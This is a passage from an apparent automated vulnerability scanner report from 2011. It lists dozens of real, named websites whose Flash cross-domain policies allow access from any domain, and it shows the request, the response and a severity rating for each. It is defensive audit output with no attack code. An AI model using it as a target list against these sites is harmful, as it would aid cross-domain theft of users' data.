P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Last-modified: Sat, 02 Apr 2011 13:24:06 GMT
Content-type: text/xml
Set-Cookie: PFUID=40ec37ca4d97237660041000ffffff9d; path=/; domain=.time.com; expires=Tue, 01-Jan-2035 00:00:00 GMT
Last-modified: Thu, 22 Jul 2010 20:05:55 GMT
Content-length: 218
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cro
...[SNIP]...

7.133. http://www.totalbeauty.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.totalbeauty.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.totalbeauty.com

Response

HTTP/1.0 200 OK
Date: Fri, 01 Apr 2011 19:18:23 GMT
Last-Modified: Tue, 22 Mar 2011 01:23:28 GMT
Accept-Ranges: bytes
Content-Length: 281
Content-Type: application/xml
_onnection: keep-alive
Via: CN-5000
Set-Cookie: cresist=43C93BCA00001F90; path=/
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policie
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.134. http://www.travelpod.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.travelpod.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:10 GMT
Server: Apache
Last-Modified: Tue, 10 Aug 2010 14:12:56 GMT
ETag: "145-48d78bac66a00"
Accept-Ranges: bytes
Content-Length: 325
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.135. http://www.urbanspoon.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.urbanspoon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.urbanspoon.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 02 Apr 2011 13:44:45 GMT
Content-Type: text/xml
Content-Length: 217
Last-Modified: Sun, 21 Dec 2008 22:23:18 GMT
Connection: close
Expires: Sat, 02 Apr 2011 14:14:45 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes

...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cro
...[SNIP]...

7.136. http://www.ustream.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ustream.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ustream.tv

Response

HTTP/1.0 200 OK
Server: Apache
Pragma: no-cache
X-RSRC: w24
Content-Type: application/xml; charset=UTF-8
Cache-Control: public, max-age=851
Expires: Sat, 02 Apr 2011 13:49:44 GMT
Date: Sat, 02 Apr 2011 13:35:33 GMT
Content-Length: 142
Connection: close

<cross-domain-policy>
               <allow-access-from domain="*" />
               <site-control permitted-cross-domain-policies="all"/>
           </cross-domain-policy>

7.137. http://www.vh1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vh1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vh1.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Wed, 22 Oct 2008 15:54:17 GMT
ETag: "13a9b68-387-459d98f7dbc40"
Accept-Ranges: bytes
Content-Length: 903
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 13:52:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.vh1.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mtvi.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.schematic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.traab.com" />
   <allow-access-from domain="*.bigfishgames.com" />
   <allow-access-from domain="*.gottempo.com" />
   <allow-access-from domain="*.vh1classic.com" />
   <allow-access-from domain="*.mtvnservices.com" />
   <allow-access-from domain="widgets.flux.com"/>
   <allow-access-from domain="*.flux.com"/>    
   <allow-access-from domain="*.flux-staging.com"/>
   <allow-access-from domain="*.scandalist.com"/>    
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.138. http://www.videosurf.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videosurf.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.videosurf.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:16 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Thu, 31 Mar 2011 08:10:38 GMT
Accept-Ranges: bytes
Content-Length: 215
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross
...[SNIP]...

7.139. http://www.weather.gov/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weather.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:09 GMT
Server: Apache
Last-Modified: Thu, 17 Jun 2010 12:56:26 GMT
Accept-Ranges: bytes
Content-Length: 167
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 13:47:09 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="SOAPAction"/>
</cross-domain-policy>

7.140. http://www.weatherbug.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weatherbug.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weatherbug.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2003.04.18T03:21-0400" exp "2004.04.18T12:00-0400" r (v 0 s 0 n 0 l 0))
P3P: CP="NOI DSP COR NID TAI STP UNI"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:44:05 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Tue, 12 Oct 2004 19:41:36 GMT
ETag: "4a25787c93b0c41:811"
Content-Length: 208

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.141. http://www.webkinz.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webkinz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.webkinz.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 29 Mar 2011 20:40:26 GMT
ETag: "588614-117-49fa511ece280"
Accept-Ranges: bytes
Content-Length: 279
_onnection: close
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:51:11 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="*" to-ports="*" secure="false" />
<allow-http-request-he
...[SNIP]...

7.142. http://www.webmd.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webmd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.webmd.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Content-Location: http://www.webmd.com/crossdomain.xml
Last-Modified: Tue, 19 Aug 2008 19:19:28 GMT
Accept-Ranges: bytes
ETag: "060a57f302c91:d8b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:38:03 GMT
Connection: keep-alive

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

7.143. http://www.wix.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wix.com

Response

HTTP/1.0 200 OK
X-Via-Node: sputnik5
Date: Sat, 02 Apr 2011 13:42:08 GMT
Server: Apache
Last-Modified: Thu, 01 Jul 2010 13:00:25 GMT
ETag: "49ac155-153-48a530dc86c40"
Accept-Ranges: bytes
Content-Length: 339
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:42:08 GMT
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="true"/>
...[SNIP]...

7.144. http://www.wowhead.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wowhead.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:27 GMT
Server: Apache
Last-Modified: Tue, 20 Jul 2010 16:55:56 GMT
ETag: "42e583-c8-48bd48f0a7f00"
Accept-Ranges: bytes
Content-Length: 200
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:33:27 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.145. http://www.wunderground.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:12 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 02 Dec 2010 17:47:34 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.146. http://www.xanga.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xanga.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xanga.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml
Last-Modified: Tue, 12 Oct 2010 20:58:52 GMT
Accept-Ranges: bytes
ETag: "131c7b46506acb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:31 GMT
Connection: close
Content-Length: 282

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" header
...[SNIP]...
<allow-access-from domain="*" to-ports="80"/>
...[SNIP]...

7.147. http://www.yardbarker.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yardbarker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yardbarker.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Sat, 02 Apr 2011 13:37:45 GMT
Content-Type: text/xml
Content-Length: 199
Last-Modified: Thu, 16 Jul 2009 00:25:33 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.148. http://www.yfrog.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yfrog.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yfrog.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Sat, 02 Apr 2011 13:27:19 GMT
Content-Type: text/xml
Connection: close
Content-Length: 1198
Last-Modified: Thu, 15 Jul 2010 21:31:01 GMT
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from headers="*" secure="false" domain="*.imageshack.us" />
<allow-http-requ
...[SNIP]...

7.149. http://www.younghollywood.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.younghollywood.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.younghollywood.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 20:59:59 GMT
ETag: "34003ca-914-49e9fd3e791c0"
Cache-Control: max-age=259200
Expires: Tue, 05 Apr 2011 13:42:08 GMT
Content-Type: application/xml
Content-Length: 2324
X-Varnish-IP: 192.168.100.142
Date: Sat, 02 Apr 2011 13:42:08 GMT
X-Varnish: 2005739098
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd" >
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*" to-ports="*"/>
   <allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.amgdgt.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtechus.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.llnwd.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tremormedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.scanscout.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fbcdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hulu.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.google.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.googleadservices.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.typepad.com"/>
   <allow-access-from domain="*.google-analytics.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yieldmanager.com"/>
   <allow-access-from domain="*.scanscout.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="brightcove.vo.llnwd.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.admeld.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.redcated" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.media6degrees.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.videoegg.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adobe.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.macromedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.collective-media.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.admeld.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.facebook.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.twitter.com" secure="false"/>
...[SNIP]...

7.150. http://www.yourfilehost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yourfilehost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yourfilehost.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:02:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 14 May 2010 18:06:54 GMT
ETag: "578851f-cd-bd784b80"
Accept-Ranges: bytes
Content-Length: 205
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.151. http://www.zillow.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zillow.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:35 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 13:36:35 GMT
ETag: W/"294-1246488758000"
Last-Modified: Wed, 01 Jul 2009 22:52:38 GMT
Content-Type: text/xml
Content-Length: 294
Set-Cookie: BIGipServertomcat_pool_0=3423341066.0.0000; path=/
Via: 1.0 www.zillow.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=2, max=71
Connection: close
Set-Cookie: BIGipServerapache_pool_0=2601257482.0.0000; path=/

<?xml version="1.0" encoding="utf-8" ?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.152. http://www.zoosnet.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zoosnet.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zoosnet.net

Response

HTTP/1.1 200 OK
Content-Length: 102
Content-Type: text/xml
Last-Modified: Thu, 15 May 2008 07:10:06 GMT
Accept-Ranges: bytes
ETag: "c669fab35ab6c81:a93"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:00:59 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.153. http://www.zvents.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zvents.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 02 Apr 2011 13:43:43 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Wed, 13 Feb 2008 03:19:32 GMT
Connection: keep-alive
Expires: Sun, 03 Apr 2011 13:43:43 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.154. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 02 Apr 2011 11:33:56 GMT
Expires: Sun, 03 Apr 2011 11:33:56 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 4215
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.155. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 02 Apr 2011 11:34:36 GMT
Expires: Sun, 03 Apr 2011 11:34:36 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 4982
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
